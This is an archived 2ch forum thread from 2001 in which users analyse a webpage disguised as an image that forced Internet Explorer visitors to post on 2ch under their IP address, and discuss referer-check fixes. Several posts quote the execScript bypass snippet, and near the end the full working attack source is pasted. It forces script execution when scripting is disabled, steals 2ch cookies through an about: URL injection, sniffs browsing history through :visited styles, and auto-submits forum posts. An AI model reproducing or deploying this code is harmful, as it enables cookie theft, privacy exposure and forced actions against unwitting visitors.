またもや2chの危機です!!

このエントリーをはてなブックマークに追加
1
ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/20.gif
「末尾の数字はいろいろ」
このリンクをブラウザから踏むとIPを抜かれ自動的にスレをたてて
しまうので興味本位でおさないようにしましょう。
今のところ半角、厨房、で被害拡大中
------------------------------
ソースhttp://choco.2ch.net/test/read.cgi/news/1008577522/l50
2名無しさん@お腹いっぱい。:01/12/17 18:02
あああああ
3名無しさん@お腹いっぱい。:01/12/17 18:03
>>1
もう消したから。
41:01/12/17 18:04
お願いします。
サイバーテロだ!
6名無しさん@お腹いっぱい。:01/12/17 18:08
5 = 島さとし
7名無しさん@お腹いっぱい。:01/12/17 18:12
島さとしって誰ですか?
8名無しさん@お腹いっぱい。:01/12/17 18:16
9名無しさん@お腹いっぱい。:01/12/17 18:24
http://kaba.2ch.net/net/kako/1003/10033/1003307159.html

タツタの部屋ってサイトは厨房のあつまり!

>1 名前: 名無しさん@お腹いっぱい。 投稿日: 01/10/17 17:25 ID:WzyGkDUq

>厨房だらけの糞さいと
>特に「天」とか名乗ってる自分を神と思ってるやつもいるしよ
>ほんとわけ分からないよ(藁

>TOPページ
>http://www2j.biglobe.ne.jp/~tatuta/_MENU.htm

>問題の掲示板
>http://www2j.biglobe.ne.jp/~tatuta/cgi-bin/ansq.htm
10名無しさん@お腹いっぱい。:01/12/17 18:30
消えたね
111:01/12/17 18:31
と言うわけで
ありがとうございました。
--------------------終了---------------------
29分で終了か...
13(´Д`):01/12/17 20:16
全然消えてないよー!
助けてよー!
ニューバージョンがでたね
15名無しさん@お腹いっぱい。:01/12/17 21:15
Javascriptのソースを貼ったやつがいてスクリプト流出。
亜種が出てあちこちのアプロダに貼られている模様。

CGI変えないと対策不可なのでしょうか?

厨房板や半角板は壊滅状態…。
>>14
> ニューバージョンがでたね
それって投稿内容変えただけのやつじゃないの?
詳細きぼーん。
171:01/12/17 21:49
-----------------再開-----------------------
なにもできない俺ですが、2chに対する思いは人一倍(だと思う)お願いします。
18 :01/12/17 21:56

Welcome to 裏2ちゃんねる!

1 :sgh-ac29.ppp.ttcn.ne.jp :01/12/17 21:35 ID:sxFhvFSp
://obuchi.naikaku.com/angriff/upred/source/1478.jpg
これです↑
19 :01/12/17 22:00
w3m使えや(わら
つーか、スクリプト切っとけばいいんだけどね
>18のリンク、w3mで見ようとするとforbiddenなんだけど
user-agentみてるのかな?
23名無しさん@お腹いっぱい。:01/12/17 22:41
この辺に経緯がでてるようだ。
http://teri.2ch.net/test/read.cgi/accuse/1008569358/

>>21
JavaScript を OFF にしててもくらうという報告がこのスレにはある。
>>18
そんなことなかったけど...
しかしちゃんと Content-Type は image/jpeg を返しているようで、
w3m は画像として表示しようとしてた。
中身は HTML なので、IE の「Content-Type に関わらず中身に合わせて解釈」
という仕様を悪用したものと思われる。
241:01/12/17 22:55
834 : :01/12/17 22:52 ID:ic7RLSxJ
このプログラムを応用したら、プロバのパスワード表示されるようなのできたんだけど・・・
やばくね?

プログラムについては無知なのでわかりませんがこれってホントですか?
25名無しさん@お腹いっぱい。:01/12/17 22:56
「2chから飛んだ場合」らしいで砂。
鯖サイド?
26名無しさん@お腹いっぱい。:01/12/17 23:12
>>22
wget で file は取れたよ。
27名無しさん@お腹いっぱい。:01/12/17 23:16
>>26
で砂。xml:やらmain()やら。
よく事情を理解していないのだけれども referer みて2ch以外からの投稿禁止にしておけばいいんじゃないの?
2928:01/12/17 23:23
だめらしいな。

------------------------------------------------------------------
104 心得をよく読みましょう sage 01/12/17 23:13 ID:4EGFRoLh
>>90
IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使って
Refererを偽装しているから無駄
------------------------------------------------------------------
30名無しさん@お腹いっぱい。:01/12/17 23:24
>>28
script 内で referer は偽造できるらしい。ので無駄。
まあなんか 2ch サイドで対策始めたらしいのでとりあえずは収まるっしょ。
つうことで寝よ寝よ。

まあしかし DDoS は恐いね。あと IE のバグ/仕様も(゚д゚;)コワー
311:01/12/17 23:25
なんかよく分からないけどがんばってください
32名無しさん@お腹いっぱい。:01/12/17 23:29
プログラム冒頭より

<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png"></noscript>
<![endif]-->

What's?
3328:01/12/17 23:33
IPアドレス固定の研究室内で隠れ2チャネラやっている私にとっては結構重要な問題だったりする(藁
34名無しさん@お腹いっぱい。:01/12/17 23:34
>JavaScript を OFF にしててもくらうという報告がこのスレにはある。
そいつはたぶんJavaをoffにしただけで、ActiveScriptはoffにしなかったのだろう。
xmlが悪い
36あぼーん:あぼーん
あぼーん
37あぼーん:あぼーん
あぼーん
38あぼーん:あぼーん
あぼーん
39あぼーん:あぼーん
あぼーん
ここが悪い

<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
41名無しさん@お腹いっぱい。:01/12/17 23:47
チェック
http://www.eucaly.net/~kei/test/check.html

IE5.5/6だとJAVAScript切っても実行されちゃうんだけど、
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
を削ると動かなくなるんだよね。
これってなんなのさ?
42 :01/12/17 23:47
79 :心得をよく読みましょう :01/12/17 23:10 ID:4EGFRoLh
JavaScriptに関しての結論

IE5.5以降ではアクティブスクリプトをオフにしても無駄
このバグ(仕様?)を利用している。
http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
IE5.01なら問題なし
43名無しさん@お腹いっぱい。:01/12/17 23:53
>削除屋さん

http://pc.2ch.net/test/read.cgi/unix/1008579712/

36-39です。

住人がソース検証している模様。
44名無しさん@お腹いっぱい。:01/12/17 23:53
>42
消えてる?
<script id=scr1 language=JScript for=window event=onload>
alert('Hello World');
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>

当方Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)で
ActiveX JAVA JAVAScript 切ってるんだけど、上のやつは実行されないんだよね。
45名無しさん@お腹いっぱい。:01/12/17 23:55
削除屋さん、流れを読んでくだせえ。
46名無しさん@お腹いっぱい。:01/12/17 23:55
>IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使ってRefererを偽装しているから無駄

↑これは間違い。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50

http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、2つ目の例では書き込めないようにすれば良い。
47削除屋 ★:01/12/17 23:57
>>45 すまん。ソース全部貼るのは許して。
48名無しさん@お腹いっぱい。:01/12/17 23:57
...しかしこれってIEの話うにっくす板の内容じゃない気が。
検証のためだったけど…削除屋さん、ソース全部張ってスイマセン。
5043:01/12/18 00:00
43です、誤爆スマソ

>>45
管理者側が恒久的対策を宣言していない状況での全ソース公開は
まずいと思われるので批判要望板で報告しました。

部分的に公開してやりとりする分にはOKかと思いますが・・・
メールで…
進行しては…
どうですか
52削除屋 ★:01/12/18 00:00
>>49 unix板の方にはいつも感謝ですけど、誰が覗き見して誰がどう悪用するかわかんないので、、スマソ
5345:01/12/18 00:02
ああ。僕の考え足らずでした。スマソ。

>>48
ソースハックはUNIX板の住人さん達にとっては
勉強、もしくはゲームなのでは。
彼がきてからマ板は危機です。 TT
5513:01/12/18 00:11
>>52
こんなにソース出回ってるのに、そういう対策はどうかと。
5628:01/12/18 00:16
解決策っぽいのが出ているようだけどどうなんでしょ?

-----------------------------------------------------------------------
563 心得をよく読みましょう  01/12/18 00:11 ID:9aT/CaI4
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50

http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのような場合でも2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、2つ目の例では書き込めないように2chのCGIを、
if ($referer =~ /xxx\.2ch\.net\/.*/)

if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば100%絶対に自動的に書き込めなくなります。
IEにRefererを偽装する機能もバグも存在しません。


574 心得をよく読みましょう sage 01/12/18 00:13 ID:TmX2ONFn
>>563
暫定措置としてはいいと思うけど
http://hoge.com/hoge.gif?http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
ってのがすぐ出回ると思われ。


585 104 sage 01/12/18 00:14 ID:pkTuEHYy
>>574
/^
で、「先頭が」 2ch.net じゃないと引っかかるので100%大丈夫です。
57jjj:01/12/18 00:21
うーん。
意味無いとおもうんだけど。
リファラって自由に設定できそうなんだけど、間違ってます?
間違ってます。てかもうかなり沈静化した模様。
5928:01/12/18 00:31
>>57
Referer自体は偽造できそうだけど、広く出回っているブラウザ上で偽造してリクエストを送ることが出来ない
ので今回のような事態を回避できるんじゃないかと思うんですが。
2chアタック用の特製ブラウザやボット相手には通じないけど、そういうのには既に別の対策がしてあるんじゃ
ないかな?
60名無しさん@お腹いっぱい。:01/12/18 00:44
ほ、放置なのか・・・<ML
母体を仕掛ける先が明らかだから、ワームとしては運用しにくいと思われ。
まあそのへんのマシンを踏み台に使えばいいんだけど(藁
621:01/12/18 16:33
このスレは多分終了しました。
ご協力ありがとうございました。
<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.pn
g"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png" id=img
1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>

var NAME='';
var TAR='';

function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;

if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+p
arent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}

function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){
t1='http://tmp.2ch.net/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}

main();

function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';
t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implemen
tation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWind
ow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}

function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}

function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[
1])}}
return '';
}

function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');
a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}

</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHT
ML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>
70名無しさん@お腹いっぱい。:02/02/27 23:16
もりあがり期待あげ
まつりだまつりだ
73名無しさん@お腹いっぱい。:02/03/10 23:08
まつつつつt
74名無しさん@お腹いっぱい。:02/03/29 19:08
ききです。黄門も閉鎖された
感動age